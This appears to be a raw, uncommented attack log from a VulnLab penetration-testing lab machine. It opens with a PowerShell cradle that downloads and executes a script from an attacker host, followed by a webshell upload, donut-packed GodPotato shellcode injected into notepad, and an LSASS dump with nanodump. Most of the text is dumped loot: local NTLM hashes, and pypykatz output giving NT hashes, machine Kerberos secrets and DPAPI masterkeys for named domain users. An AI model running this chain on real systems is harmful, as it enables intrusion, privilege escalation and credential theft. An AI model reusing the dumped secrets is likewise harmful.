172.16.20.100
PS C:\> cat user.txt
VL{f8ac47197978c087b4b882e84fbdc328}
(New-Object System.Net.WebClient).DownloadString('http://10.8.0.154/amsi64.txt') | IEX
upload test.aspx
powershell "IEX (New-Object System.Net.WebClient).DownloadString('http://10.8.0.154:80/amsi64.txt')"
upload sharp.ps1
./donut -i /home/jay/vulnlab/breach/GodPotato-NET4.exe -a 2 -b 2 -o /tmp/payload.bin -p '-cmd "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -noprofile -executionpolicy bypass -file c:\windows\tasks\sharp.ps1"'
execute notepad.exe
ps -e notepad
execute-shellcode -p 3604 /tmp/payload.bin
ps
nanodump 684 test 1 PMDM
download test
python3 -m pypykatz lsa minidump test
Loot
[*] Successfully executed hashdump
[*] Got output:
Administrator:500:Administrator:500:aad3b435b51404eeaad3b435b51404ee:16cde38a1f64a080a884f92db4932c98:::::
Guest:501:Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::::
DefaultAccount:503:DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::::
WDAGUtilityAccount:504:WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:81887874100e95ffab05dcfbe8fd9229:::::
Username: S021M010$
Domain: WORK-JUNON
LM: NA
NT: f9087ef9674b02028a557c81a27f1424
SHA1: 1c95d197194f9ba60aa9aa8106b3c3b09fb88a5c
DPAPI: NA
Username: S021M010$
Domain: WORK-JUNON
LM: NA
NT: bec2d0fdb0b6a3361cf75bb30de40753
SHA1: 9a4ee2f6573931f9333d4a7ef1632de6e8aab41f
DPAPI: NA
Username: S021M010$
Domain: WORK-JUNON
LM: NA
NT: f9087ef9674b02028a557c81a27f1424
SHA1: 1c95d197194f9ba60aa9aa8106b3c3b09fb88a5c
DPAPI: NA
INFO:pypykatz:Parsing file test
FILE: ======== test =======
== LogonSession ==
authentication_id 10868585 (a5d769)
session_id 0
username hazel.simpson
domainname WORK-JUNON
logon_server S021M005
logon_time 2024-06-12T17:59:13.798175+00:00
sid S-1-5-21-1112787665-3955584987-2510362858-1398
luid 10868585
== MSV ==
Username: Hazel.Simpson
Domain: WORK-JUNON
LM: NA
NT: 4210e68078724566518b8ad3f197a4a6
SHA1: 800944dc995bd6c213b927d92b86f916114ead8f
DPAPI: b5ebab839aa722d4d7efd4aa920eecb3
== WDIGEST [a5d769]==
username Hazel.Simpson
domainname WORK-JUNON
password None
password (hex)
== Kerberos ==
Username: hazel.simpson
Domain: WORK.JUNON.VL
== WDIGEST [a5d769]==
username Hazel.Simpson
domainname WORK-JUNON
password None
password (hex)
== LogonSession ==
authentication_id 10820280 (a51ab8)
session_id 0
username hazel.simpson
domainname WORK-JUNON
logon_server S021M005
logon_time 2024-06-12T17:56:32.027641+00:00
sid S-1-5-21-1112787665-3955584987-2510362858-1398
luid 10820280
== MSV ==
Username: Hazel.Simpson
Domain: WORK-JUNON
LM: NA
NT: 4210e68078724566518b8ad3f197a4a6
SHA1: 800944dc995bd6c213b927d92b86f916114ead8f
DPAPI: b5ebab839aa722d4d7efd4aa920eecb3
== WDIGEST [a51ab8]==
username Hazel.Simpson
domainname WORK-JUNON
password None
password (hex)
== Kerberos ==
Username: hazel.simpson
Domain: WORK.JUNON.VL
== WDIGEST [a51ab8]==
username Hazel.Simpson
domainname WORK-JUNON
password None
password (hex)
== LogonSession ==
authentication_id 2241617 (223451)
session_id 2
username Wendy.Vincent
domainname WORK-JUNON
logon_server S021M005
logon_time 2024-06-12T13:22:21.432576+00:00
sid S-1-5-21-1112787665-3955584987-2510362858-1124
luid 2241617
== MSV ==
Username: Wendy.Vincent
Domain: WORK-JUNON
LM: NA
NT: 4210e68078724566518b8ad3f197a4a6
SHA1: 800944dc995bd6c213b927d92b86f916114ead8f
DPAPI: 332feb4f81ce474e59465bfd438c6fec
== WDIGEST [223451]==
username Wendy.Vincent
domainname WORK-JUNON
password None
password (hex)
== Kerberos ==
Username: wendy.vincent
Domain: WORK.JUNON.VL
== WDIGEST [223451]==
username Wendy.Vincent
domainname WORK-JUNON
password None
password (hex)
== DPAPI [223451]==
luid 2241617
key_guid aa83e4c8-5a5b-4852-8ba8-15d7e9108699
masterkey bb5db2354653fce36d80729138e62110b68fde6abe3c2636731d36ff8c28a103786976f422930dd6a74591339a8254ad276c0ca4855f4d5eb499f3384d5ab160
sha1_masterkey 4b73b13cae2aad06eec47bf3a4d4cd6f1d5cdae3
== LogonSession ==
authentication_id 2175943 (2133c7)
session_id 2
username DWM-2
domainname Window Manager
logon_server
logon_time 2024-06-12T13:22:17.024026+00:00
sid S-1-5-90-0-2
luid 2175943
== MSV ==
Username: S021M010$
Domain: WORK-JUNON
LM: NA
NT: f9087ef9674b02028a557c81a27f1424
SHA1: 1c95d197194f9ba60aa9aa8106b3c3b09fb88a5c
DPAPI: NA
== WDIGEST [2133c7]==
username S021M010$
domainname WORK-JUNON
password None
password (hex)
== Kerberos ==
Username: S021M010$
Domain: work.junon.vl
Password: 54d05695a4f21ff6a7a7abe2b517d249301da3db85a26932eb169b803723aa8bb62c6efe08306892a0cc5a971847c9f770daf758b6c0b463f0787d7de8d273d07bc185d86cdfbdd93c0d322dfe34ac70304347cf2745efff356bbad7cbd5134725e441f3767488604ed4e000570ac44139eed6c8b2c7dd8202b318424f04534195f238ceff3c11cf13aa7d7ceab69f38ca478bafc52f215c0fa1dc4051dc80bed45010b5277942c6f7d6d3cbd9f840bd2ce3d656c1a4578c6a1747405a13b0cbc16a73232cc452d02dc43e9ff875714622844ae243fbe8425dbf80e8101f384dd183ba3d1f464fce611121ad1b84793c
password (hex)54d05695a4f21ff6a7a7abe2b517d249301da3db85a26932eb169b803723aa8bb62c6efe08306892a0cc5a971847c9f770daf758b6c0b463f0787d7de8d273d07bc185d86cdfbdd93c0d322dfe34ac70304347cf2745efff356bbad7cbd5134725e441f3767488604ed4e000570ac44139eed6c8b2c7dd8202b318424f04534195f238ceff3c11cf13aa7d7ceab69f38ca478bafc52f215c0fa1dc4051dc80bed45010b5277942c6f7d6d3cbd9f840bd2ce3d656c1a4578c6a1747405a13b0cbc16a73232cc452d02dc43e9ff875714622844ae243fbe8425dbf80e8101f384dd183ba3d1f464fce611121ad1b84793c
== WDIGEST [2133c7]==
username S021M010$
domainname WORK-JUNON
password None
password (hex)
== LogonSession ==
authentication_id 2172448 (212620)
session_id 2
username UMFD-2
domainname Font Driver Host
logon_server
logon_time 2024-06-12T13:22:16.835996+00:00
sid S-1-5-96-0-2
luid 2172448
== MSV ==
Username: S021M010$
Domain: WORK-JUNON
LM: NA
NT: f9087ef9674b02028a557c81a27f1424
SHA1: 1c95d197194f9ba60aa9aa8106b3c3b09fb88a5c
DPAPI: NA
== WDIGEST [212620]==
username S021M010$
domainname WORK-JUNON
password None
password (hex)
== Kerberos ==
Username: S021M010$
Domain: work.junon.vl
Password: 54d05695a4f21ff6a7a7abe2b517d249301da3db85a26932eb169b803723aa8bb62c6efe08306892a0cc5a971847c9f770daf758b6c0b463f0787d7de8d273d07bc185d86cdfbdd93c0d322dfe34ac70304347cf2745efff356bbad7cbd5134725e441f3767488604ed4e000570ac44139eed6c8b2c7dd8202b318424f04534195f238ceff3c11cf13aa7d7ceab69f38ca478bafc52f215c0fa1dc4051dc80bed45010b5277942c6f7d6d3cbd9f840bd2ce3d656c1a4578c6a1747405a13b0cbc16a73232cc452d02dc43e9ff875714622844ae243fbe8425dbf80e8101f384dd183ba3d1f464fce611121ad1b84793c
password (hex)54d05695a4f21ff6a7a7abe2b517d249301da3db85a26932eb169b803723aa8bb62c6efe08306892a0cc5a971847c9f770daf758b6c0b463f0787d7de8d273d07bc185d86cdfbdd93c0d322dfe34ac70304347cf2745efff356bbad7cbd5134725e441f3767488604ed4e000570ac44139eed6c8b2c7dd8202b318424f04534195f238ceff3c11cf13aa7d7ceab69f38ca478bafc52f215c0fa1dc4051dc80bed45010b5277942c6f7d6d3cbd9f840bd2ce3d656c1a4578c6a1747405a13b0cbc16a73232cc452d02dc43e9ff875714622844ae243fbe8425dbf80e8101f384dd183ba3d1f464fce611121ad1b84793c
== WDIGEST [212620]==
username S021M010$
domainname WORK-JUNON
password None
password (hex)
== LogonSession ==
authentication_id 996 (3e4)
session_id 0
username S021M010$
domainname WORK-JUNON
logon_server
logon_time 2024-06-12T13:15:19.441875+00:00
sid S-1-5-20
luid 996
== MSV ==
Username: S021M010$
Domain: WORK-JUNON
LM: NA
NT: f9087ef9674b02028a557c81a27f1424
SHA1: 1c95d197194f9ba60aa9aa8106b3c3b09fb88a5c
DPAPI: NA
== WDIGEST [3e4]==
username S021M010$
domainname WORK-JUNON
password None
password (hex)
== Kerberos ==
Username: s021m010$
Domain: WORK.JUNON.VL
== WDIGEST [3e4]==
username S021M010$
domainname WORK-JUNON
password None
password (hex)
== LogonSession ==
authentication_id 18522137 (11aa019)
session_id 4
username wendy.vincent
domainname WORK-JUNON
logon_server S021M005
logon_time 2024-06-12T21:51:36.872772+00:00
sid S-1-5-21-1112787665-3955584987-2510362858-1124
luid 18522137
== MSV ==
Username: Wendy.Vincent
Domain: WORK-JUNON
LM: NA
NT: 4210e68078724566518b8ad3f197a4a6
SHA1: 800944dc995bd6c213b927d92b86f916114ead8f
DPAPI: 332feb4f81ce474e59465bfd438c6fec
== WDIGEST [11aa019]==
username Wendy.Vincent
domainname WORK-JUNON
password None
password (hex)
== Kerberos ==
Username:
Domain:
== WDIGEST [11aa019]==
username Wendy.Vincent
domainname WORK-JUNON
password None
password (hex)
== DPAPI [11aa019]==
luid 18522137
key_guid 222bc2ca-53fa-4cf9-8923-cd6b9e3ace91
masterkey 7e45953305ca9dfecc79c85ec2692932b43d6181c0f5115e2000bd19361ac29ad9965b6a7870fc23cbf4564ce21d99d179d0256b1ff6691ad99eb20a66550d08
sha1_masterkey 8fc487400c06c0a7ddd9f6fb8ae2e04cdad6360c
== LogonSession ==
authentication_id 18479838 (119fade)
session_id 0
username Wendy.Vincent
domainname WORK-JUNON
logon_server S021M005
logon_time 2024-06-12T21:51:30.763051+00:00
sid S-1-5-21-1112787665-3955584987-2510362858-1124
luid 18479838
== LogonSession ==
authentication_id 10728750 (a3b52e)
session_id 0
username terry.lowe
domainname WORK-JUNON
logon_server S021M005
logon_time 2024-06-12T17:51:11.454032+00:00
sid S-1-5-21-1112787665-3955584987-2510362858-1371
luid 10728750
== MSV ==
Username: Terry.Lowe
Domain: WORK-JUNON
LM: NA
NT: 4210e68078724566518b8ad3f197a4a6
SHA1: 800944dc995bd6c213b927d92b86f916114ead8f
DPAPI: 0a19bf98ea5b7691e168669c685fe72d
== WDIGEST [a3b52e]==
username Terry.Lowe
domainname WORK-JUNON
password None
password (hex)
== Kerberos ==
Username: terry.lowe
Domain: WORK.JUNON.VL
== WDIGEST [a3b52e]==
username Terry.Lowe
domainname WORK-JUNON
password None
password (hex)
== LogonSession ==
authentication_id 8777008 (85ed30)
session_id 0
username DefaultAppPool
domainname IIS APPPOOL
logon_server
logon_time 2024-06-12T16:34:50.838270+00:00
sid S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415
luid 8777008
== MSV ==
Username: S021M010$
Domain: WORK-JUNON
LM: NA
NT: f9087ef9674b02028a557c81a27f1424
SHA1: 1c95d197194f9ba60aa9aa8106b3c3b09fb88a5c
DPAPI: NA
== WDIGEST [85ed30]==
username S021M010$
domainname WORK-JUNON
password None
password (hex)
== Kerberos ==
Username: S021M010$
Domain: work.junon.vl
Password: 54d05695a4f21ff6a7a7abe2b517d249301da3db85a26932eb169b803723aa8bb62c6efe08306892a0cc5a971847c9f770daf758b6c0b463f0787d7de8d273d07bc185d86cdfbdd93c0d322dfe34ac70304347cf2745efff356bbad7cbd5134725e441f3767488604ed4e000570ac44139eed6c8b2c7dd8202b318424f04534195f238ceff3c11cf13aa7d7ceab69f38ca478bafc52f215c0fa1dc4051dc80bed45010b5277942c6f7d6d3cbd9f840bd2ce3d656c1a4578c6a1747405a13b0cbc16a73232cc452d02dc43e9ff875714622844ae243fbe8425dbf80e8101f384dd183ba3d1f464fce611121ad1b84793c
password (hex)54d05695a4f21ff6a7a7abe2b517d249301da3db85a26932eb169b803723aa8bb62c6efe08306892a0cc5a971847c9f770daf758b6c0b463f0787d7de8d273d07bc185d86cdfbdd93c0d322dfe34ac70304347cf2745efff356bbad7cbd5134725e441f3767488604ed4e000570ac44139eed6c8b2c7dd8202b318424f04534195f238ceff3c11cf13aa7d7ceab69f38ca478bafc52f215c0fa1dc4051dc80bed45010b5277942c6f7d6d3cbd9f840bd2ce3d656c1a4578c6a1747405a13b0cbc16a73232cc452d02dc43e9ff875714622844ae243fbe8425dbf80e8101f384dd183ba3d1f464fce611121ad1b84793c
== WDIGEST [85ed30]==
username S021M010$
domainname WORK-JUNON
password None
password (hex)
== LogonSession ==
authentication_id 7197761 (6dd441)
session_id 3
username terry.lowe
domainname WORK-JUNON
logon_server S021M005
logon_time 2024-06-12T15:59:27.059715+00:00
sid S-1-5-21-1112787665-3955584987-2510362858-1371
luid 7197761
== MSV ==
Username: Terry.Lowe
Domain: WORK-JUNON
LM: NA
NT: 4210e68078724566518b8ad3f197a4a6
SHA1: 800944dc995bd6c213b927d92b86f916114ead8f
DPAPI: 0a19bf98ea5b7691e168669c685fe72d
== WDIGEST [6dd441]==
username Terry.Lowe
domainname WORK-JUNON
password None
password (hex)
== Kerberos ==
Username: terry.lowe
Domain: WORK.JUNON.VL
== WDIGEST [6dd441]==
username Terry.Lowe
domainname WORK-JUNON
password None
password (hex)
== DPAPI [6dd441]==
luid 7197761
key_guid 9d04a9a7-d522-4f5b-81db-cc8de0a6f61c
masterkey 87285f2bbf19cc2f170cf9773e74a8ddeed81c72b9189902dd62755ba31f5f94cabe138b5d7dcf9a944b955593c6c144c5f3e6050beb1ff7ca9a97723111d1cb
sha1_masterkey c193dafee32be38f42c489546efd58b24f2f56f0
== DPAPI [6dd441]==
luid 7197761
key_guid b2eab09c-2e45-4a61-a167-c8a029352486
masterkey 3967d7697851a6ea457d956d5c650b19244b813cdf9b78a1392963ad8885647807ac30954c03eaf6ad1575080ef6a67afb4960ce406953164b1f0ff101165224
sha1_masterkey d214e56b831d9258b2f6eeeed053298752347a82
== LogonSession ==
authentication_id 7170157 (6d686d)
session_id 3
username DWM-3
domainname Window Manager
logon_server
logon_time 2024-06-12T15:59:26.137853+00:00
sid S-1-5-90-0-3
luid 7170157
== MSV ==
Username: S021M010$
Domain: WORK-JUNON
LM: NA
NT: f9087ef9674b02028a557c81a27f1424
SHA1: 1c95d197194f9ba60aa9aa8106b3c3b09fb88a5c
DPAPI: NA
== WDIGEST [6d686d]==
username S021M010$
domainname WORK-JUNON
password None
password (hex)
== Kerberos ==
Username: S021M010$
Domain: work.junon.vl
Password: 54d05695a4f21ff6a7a7abe2b517d249301da3db85a26932eb169b803723aa8bb62c6efe08306892a0cc5a971847c9f770daf758b6c0b463f0787d7de8d273d07bc185d86cdfbdd93c0d322dfe34ac70304347cf2745efff356bbad7cbd5134725e441f3767488604ed4e000570ac44139eed6c8b2c7dd8202b318424f04534195f238ceff3c11cf13aa7d7ceab69f38ca478bafc52f215c0fa1dc4051dc80bed45010b5277942c6f7d6d3cbd9f840bd2ce3d656c1a4578c6a1747405a13b0cbc16a73232cc452d02dc43e9ff875714622844ae243fbe8425dbf80e8101f384dd183ba3d1f464fce611121ad1b84793c
password (hex)54d05695a4f21ff6a7a7abe2b517d249301da3db85a26932eb169b803723aa8bb62c6efe08306892a0cc5a971847c9f770daf758b6c0b463f0787d7de8d273d07bc185d86cdfbdd93c0d322dfe34ac70304347cf2745efff356bbad7cbd5134725e441f3767488604ed4e000570ac44139eed6c8b2c7dd8202b318424f04534195f238ceff3c11cf13aa7d7ceab69f38ca478bafc52f215c0fa1dc4051dc80bed45010b5277942c6f7d6d3cbd9f840bd2ce3d656c1a4578c6a1747405a13b0cbc16a73232cc452d02dc43e9ff875714622844ae243fbe8425dbf80e8101f384dd183ba3d1f464fce611121ad1b84793c
== WDIGEST [6d686d]==
username S021M010$
domainname WORK-JUNON
password None
password (hex)
== LogonSession ==
authentication_id 7168703 (6d62bf)
session_id 3
username DWM-3
domainname Window Manager
logon_server
logon_time 2024-06-12T15:59:26.091331+00:00
sid S-1-5-90-0-3
luid 7168703
== MSV ==
Username: S021M010$
Domain: WORK-JUNON
LM: NA
NT: f9087ef9674b02028a557c81a27f1424
SHA1: 1c95d197194f9ba60aa9aa8106b3c3b09fb88a5c
DPAPI: NA
== WDIGEST [6d62bf]==
username S021M010$
domainname WORK-JUNON
password None
password (hex)
== Kerberos ==
Username: S021M010$
Domain: work.junon.vl
Password: 54d05695a4f21ff6a7a7abe2b517d249301da3db85a26932eb169b803723aa8bb62c6efe08306892a0cc5a971847c9f770daf758b6c0b463f0787d7de8d273d07bc185d86cdfbdd93c0d322dfe34ac70304347cf2745efff356bbad7cbd5134725e441f3767488604ed4e000570ac44139eed6c8b2c7dd8202b318424f04534195f238ceff3c11cf13aa7d7ceab69f38ca478bafc52f215c0fa1dc4051dc80bed45010b5277942c6f7d6d3cbd9f840bd2ce3d656c1a4578c6a1747405a13b0cbc16a73232cc452d02dc43e9ff875714622844ae243fbe8425dbf80e8101f384dd183ba3d1f464fce611121ad1b84793c
password (hex)54d05695a4f21ff6a7a7abe2b517d249301da3db85a26932eb169b803723aa8bb62c6efe08306892a0cc5a971847c9f770daf758b6c0b463f0787d7de8d273d07bc185d86cdfbdd93c0d322dfe34ac70304347cf2745efff356bbad7cbd5134725e441f3767488604ed4e000570ac44139eed6c8b2c7dd8202b318424f04534195f238ceff3c11cf13aa7d7ceab69f38ca478bafc52f215c0fa1dc4051dc80bed45010b5277942c6f7d6d3cbd9f840bd2ce3d656c1a4578c6a1747405a13b0cbc16a73232cc452d02dc43e9ff875714622844ae243fbe8425dbf80e8101f384dd183ba3d1f464fce611121ad1b84793c
== WDIGEST [6d62bf]==
username S021M010$
domainname WORK-JUNON
password None
password (hex)
== LogonSession ==
authentication_id 7167107 (6d5c83)
session_id 3
username UMFD-3
domainname Font Driver Host
logon_server
logon_time 2024-06-12T15:59:26.028490+00:00
sid S-1-5-96-0-3
luid 7167107
== MSV ==
Username: S021M010$
Domain: WORK-JUNON
LM: NA
NT: f9087ef9674b02028a557c81a27f1424
SHA1: 1c95d197194f9ba60aa9aa8106b3c3b09fb88a5c
DPAPI: NA
== WDIGEST [6d5c83]==
username S021M010$
domainname WORK-JUNON
password None
password (hex)
== Kerberos ==
Username: S021M010$
Domain: work.junon.vl
Password: 54d05695a4f21ff6a7a7abe2b517d249301da3db85a26932eb169b803723aa8bb62c6efe08306892a0cc5a971847c9f770daf758b6c0b463f0787d7de8d273d07bc185d86cdfbdd93c0d322dfe34ac70304347cf2745efff356bbad7cbd5134725e441f3767488604ed4e000570ac44139eed6c8b2c7dd8202b318424f04534195f238ceff3c11cf13aa7d7ceab69f38ca478bafc52f215c0fa1dc4051dc80bed45010b5277942c6f7d6d3cbd9f840bd2ce3d656c1a4578c6a1747405a13b0cbc16a73232cc452d02dc43e9ff875714622844ae243fbe8425dbf80e8101f384dd183ba3d1f464fce611121ad1b84793c
password (hex)54d05695a4f21ff6a7a7abe2b517d249301da3db85a26932eb169b803723aa8bb62c6efe08306892a0cc5a971847c9f770daf758b6c0b463f0787d7de8d273d07bc185d86cdfbdd93c0d322dfe34ac70304347cf2745efff356bbad7cbd5134725e441f3767488604ed4e000570ac44139eed6c8b2c7dd8202b318424f04534195f238ceff3c11cf13aa7d7ceab69f38ca478bafc52f215c0fa1dc4051dc80bed45010b5277942c6f7d6d3cbd9f840bd2ce3d656c1a4578c6a1747405a13b0cbc16a73232cc452d02dc43e9ff875714622844ae243fbe8425dbf80e8101f384dd183ba3d1f464fce611121ad1b84793c
== WDIGEST [6d5c83]==
username S021M010$
domainname WORK-JUNON
password None
password (hex)
== LogonSession ==
authentication_id 2178101 (213c35)
session_id 2
username DWM-2
domainname Window Manager
logon_server
logon_time 2024-06-12T13:22:17.165542+00:00
sid S-1-5-90-0-2
luid 2178101
== MSV ==
Username: S021M010$
Domain: WORK-JUNON
LM: NA
NT: f9087ef9674b02028a557c81a27f1424
SHA1: 1c95d197194f9ba60aa9aa8106b3c3b09fb88a5c
DPAPI: NA
== WDIGEST [213c35]==
username S021M010$
domainname WORK-JUNON
password None
password (hex)
== Kerberos ==
Username: S021M010$
Domain: work.junon.vl
Password: 54d05695a4f21ff6a7a7abe2b517d249301da3db85a26932eb169b803723aa8bb62c6efe08306892a0cc5a971847c9f770daf758b6c0b463f0787d7de8d273d07bc185d86cdfbdd93c0d322dfe34ac70304347cf2745efff356bbad7cbd5134725e441f3767488604ed4e000570ac44139eed6c8b2c7dd8202b318424f04534195f238ceff3c11cf13aa7d7ceab69f38ca478bafc52f215c0fa1dc4051dc80bed45010b5277942c6f7d6d3cbd9f840bd2ce3d656c1a4578c6a1747405a13b0cbc16a73232cc452d02dc43e9ff875714622844ae243fbe8425dbf80e8101f384dd183ba3d1f464fce611121ad1b84793c
password (hex)54d05695a4f21ff6a7a7abe2b517d249301da3db85a26932eb169b803723aa8bb62c6efe08306892a0cc5a971847c9f770daf758b6c0b463f0787d7de8d273d07bc185d86cdfbdd93c0d322dfe34ac70304347cf2745efff356bbad7cbd5134725e441f3767488604ed4e000570ac44139eed6c8b2c7dd8202b318424f04534195f238ceff3c11cf13aa7d7ceab69f38ca478bafc52f215c0fa1dc4051dc80bed45010b5277942c6f7d6d3cbd9f840bd2ce3d656c1a4578c6a1747405a13b0cbc16a73232cc452d02dc43e9ff875714622844ae243fbe8425dbf80e8101f384dd183ba3d1f464fce611121ad1b84793c
== WDIGEST [213c35]==
username S021M010$
domainname WORK-JUNON
password None
password (hex)
== LogonSession ==
authentication_id 995 (3e3)
session_id 0
username IUSR
domainname NT AUTHORITY
logon_server
logon_time 2024-06-12T13:15:27.723100+00:00
sid S-1-5-17
luid 995
== LogonSession ==
authentication_id 997 (3e5)
session_id 0
username LOCAL SERVICE
domainname NT AUTHORITY
logon_server
logon_time 2024-06-12T13:15:22.879420+00:00
sid S-1-5-19
luid 997
== Kerberos ==
Username:
Domain:
== LogonSession ==
authentication_id 78973 (1347d)
session_id 1
username DWM-1
domainname Window Manager
logon_server
logon_time 2024-06-12T13:15:22.191786+00:00
sid S-1-5-90-0-1
luid 78973
== MSV ==
Username: S021M010$
Domain: WORK-JUNON
LM: NA
NT: bec2d0fdb0b6a3361cf75bb30de40753
SHA1: 9a4ee2f6573931f9333d4a7ef1632de6e8aab41f
DPAPI: NA
== WDIGEST [1347d]==
username S021M010$
domainname WORK-JUNON
password None
password (hex)
== Kerberos ==
Username: S021M010$
Domain: work.junon.vl
Password: 4eb5ecb7c71e86b56eed34a02ff1659fe4713386115b427b362dc8d9e1f5a39930a5cd71ce8aec1df6cae3b23e39bf05455ed56ff6396636339f873a152684aef3b4337a86185af1c348103bf6b457d5fa2781179d834eabf588a289f02415dfb4ce45680493860efe42a1430517751c299bf33a028aca28df1ca6fdbf76a39e81789ca0accffc255c84413fe98530423138d1535463d5335949bab9fbcec83ef1fbeebe405fde39d33a69d2cd546d36a28a19c02490a71085cfd0490219b5f2152c56585bc3d4963de3c21bcd2fb758e3a1ee2ac739e6ce75ab814efd07003809d032da0eab63f943f2bfa174518e7e
password (hex)4eb5ecb7c71e86b56eed34a02ff1659fe4713386115b427b362dc8d9e1f5a39930a5cd71ce8aec1df6cae3b23e39bf05455ed56ff6396636339f873a152684aef3b4337a86185af1c348103bf6b457d5fa2781179d834eabf588a289f02415dfb4ce45680493860efe42a1430517751c299bf33a028aca28df1ca6fdbf76a39e81789ca0accffc255c84413fe98530423138d1535463d5335949bab9fbcec83ef1fbeebe405fde39d33a69d2cd546d36a28a19c02490a71085cfd0490219b5f2152c56585bc3d4963de3c21bcd2fb758e3a1ee2ac739e6ce75ab814efd07003809d032da0eab63f943f2bfa174518e7e
== WDIGEST [1347d]==
username S021M010$
domainname WORK-JUNON
password None
password (hex)
== LogonSession ==
authentication_id 78947 (13463)
session_id 1
username DWM-1
domainname Window Manager
logon_server
logon_time 2024-06-12T13:15:22.191786+00:00
sid S-1-5-90-0-1
luid 78947
== MSV ==
Username: S021M010$
Domain: WORK-JUNON
LM: NA
NT: f9087ef9674b02028a557c81a27f1424
SHA1: 1c95d197194f9ba60aa9aa8106b3c3b09fb88a5c
DPAPI: NA
== WDIGEST [13463]==
username S021M010$
domainname WORK-JUNON
password None
password (hex)
== Kerberos ==
Username: S021M010$
Domain: work.junon.vl
Password: 54d05695a4f21ff6a7a7abe2b517d249301da3db85a26932eb169b803723aa8bb62c6efe08306892a0cc5a971847c9f770daf758b6c0b463f0787d7de8d273d07bc185d86cdfbdd93c0d322dfe34ac70304347cf2745efff356bbad7cbd5134725e441f3767488604ed4e000570ac44139eed6c8b2c7dd8202b318424f04534195f238ceff3c11cf13aa7d7ceab69f38ca478bafc52f215c0fa1dc4051dc80bed45010b5277942c6f7d6d3cbd9f840bd2ce3d656c1a4578c6a1747405a13b0cbc16a73232cc452d02dc43e9ff875714622844ae243fbe8425dbf80e8101f384dd183ba3d1f464fce611121ad1b84793c
password (hex)54d05695a4f21ff6a7a7abe2b517d249301da3db85a26932eb169b803723aa8bb62c6efe08306892a0cc5a971847c9f770daf758b6c0b463f0787d7de8d273d07bc185d86cdfbdd93c0d322dfe34ac70304347cf2745efff356bbad7cbd5134725e441f3767488604ed4e000570ac44139eed6c8b2c7dd8202b318424f04534195f238ceff3c11cf13aa7d7ceab69f38ca478bafc52f215c0fa1dc4051dc80bed45010b5277942c6f7d6d3cbd9f840bd2ce3d656c1a4578c6a1747405a13b0cbc16a73232cc452d02dc43e9ff875714622844ae243fbe8425dbf80e8101f384dd183ba3d1f464fce611121ad1b84793c
== WDIGEST [13463]==
username S021M010$
domainname WORK-JUNON
password None
password (hex)
== LogonSession ==
authentication_id 45130 (b04a)
session_id 0
username UMFD-0
domainname Font Driver Host
logon_server
logon_time 2024-06-12T13:15:18.769882+00:00
sid S-1-5-96-0-0
luid 45130
== MSV ==
Username: S021M010$
Domain: WORK-JUNON
LM: NA
NT: f9087ef9674b02028a557c81a27f1424
SHA1: 1c95d197194f9ba60aa9aa8106b3c3b09fb88a5c
DPAPI: NA
== WDIGEST [b04a]==
username S021M010$
domainname WORK-JUNON
password None
password (hex)
== Kerberos ==
Username: S021M010$
Domain: work.junon.vl
Password: 54d05695a4f21ff6a7a7abe2b517d249301da3db85a26932eb169b803723aa8bb62c6efe08306892a0cc5a971847c9f770daf758b6c0b463f0787d7de8d273d07bc185d86cdfbdd93c0d322dfe34ac70304347cf2745efff356bbad7cbd5134725e441f3767488604ed4e000570ac44139eed6c8b2c7dd8202b318424f04534195f238ceff3c11cf13aa7d7ceab69f38ca478bafc52f215c0fa1dc4051dc80bed45010b5277942c6f7d6d3cbd9f840bd2ce3d656c1a4578c6a1747405a13b0cbc16a73232cc452d02dc43e9ff875714622844ae243fbe8425dbf80e8101f384dd183ba3d1f464fce611121ad1b84793c
password (hex)54d05695a4f21ff6a7a7abe2b517d249301da3db85a26932eb169b803723aa8bb62c6efe08306892a0cc5a971847c9f770daf758b6c0b463f0787d7de8d273d07bc185d86cdfbdd93c0d322dfe34ac70304347cf2745efff356bbad7cbd5134725e441f3767488604ed4e000570ac44139eed6c8b2c7dd8202b318424f04534195f238ceff3c11cf13aa7d7ceab69f38ca478bafc52f215c0fa1dc4051dc80bed45010b5277942c6f7d6d3cbd9f840bd2ce3d656c1a4578c6a1747405a13b0cbc16a73232cc452d02dc43e9ff875714622844ae243fbe8425dbf80e8101f384dd183ba3d1f464fce611121ad1b84793c
== WDIGEST [b04a]==
username S021M010$
domainname WORK-JUNON
password None
password (hex)
== LogonSession ==
authentication_id 45015 (afd7)
session_id 1
username UMFD-1
domainname Font Driver Host
logon_server
logon_time 2024-06-12T13:15:18.754664+00:00
sid S-1-5-96-0-1
luid 45015
== MSV ==
Username: S021M010$
Domain: WORK-JUNON
LM: NA
NT: f9087ef9674b02028a557c81a27f1424
SHA1: 1c95d197194f9ba60aa9aa8106b3c3b09fb88a5c
DPAPI: NA
== WDIGEST [afd7]==
username S021M010$
domainname WORK-JUNON
password None
password (hex)
== Kerberos ==
Username: S021M010$
Domain: work.junon.vl
Password: 54d05695a4f21ff6a7a7abe2b517d249301da3db85a26932eb169b803723aa8bb62c6efe08306892a0cc5a971847c9f770daf758b6c0b463f0787d7de8d273d07bc185d86cdfbdd93c0d322dfe34ac70304347cf2745efff356bbad7cbd5134725e441f3767488604ed4e000570ac44139eed6c8b2c7dd8202b318424f04534195f238ceff3c11cf13aa7d7ceab69f38ca478bafc52f215c0fa1dc4051dc80bed45010b5277942c6f7d6d3cbd9f840bd2ce3d656c1a4578c6a1747405a13b0cbc16a73232cc452d02dc43e9ff875714622844ae243fbe8425dbf80e8101f384dd183ba3d1f464fce611121ad1b84793c
password (hex)54d05695a4f21ff6a7a7abe2b517d249301da3db85a26932eb169b803723aa8bb62c6efe08306892a0cc5a971847c9f770daf758b6c0b463f0787d7de8d273d07bc185d86cdfbdd93c0d322dfe34ac70304347cf2745efff356bbad7cbd5134725e441f3767488604ed4e000570ac44139eed6c8b2c7dd8202b318424f04534195f238ceff3c11cf13aa7d7ceab69f38ca478bafc52f215c0fa1dc4051dc80bed45010b5277942c6f7d6d3cbd9f840bd2ce3d656c1a4578c6a1747405a13b0cbc16a73232cc452d02dc43e9ff875714622844ae243fbe8425dbf80e8101f384dd183ba3d1f464fce611121ad1b84793c
== WDIGEST [afd7]==
username S021M010$
domainname WORK-JUNON
password None
password (hex)
== LogonSession ==
